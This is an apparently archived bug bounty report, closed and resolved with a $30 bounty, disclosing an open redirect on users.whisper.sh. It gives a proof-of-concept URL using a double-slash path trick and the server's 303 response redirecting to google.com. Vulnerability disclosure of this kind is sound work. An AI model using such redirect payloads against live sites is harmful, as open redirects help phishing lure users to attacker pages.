Loading HuntDB...

Open Redirection Found in users.whisper.sh

W
Whisper
Submitted None
Reported by hackedbrain

Vulnerability Details

Technical details and impact analysis

Open Redirect
I found that one of your subdomains users.whisper.sh is vulnerable to open redirection. POC: `http://users.whisper.sh//google.com/%2f..` Response: ``` HTTP/1.1 303 See Other X-Powered-By: Express Location: //google.com/%2f../ Set-Cookie: CM; Path=/; HttpOnly Date: Sat, 19 Aug 2017 14:22:50 GMT Content-Length: 34 Via: 1.1 google Redirecting to //google.com/%2f../ ```

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$30.00

Submitted

Weakness

Open Redirect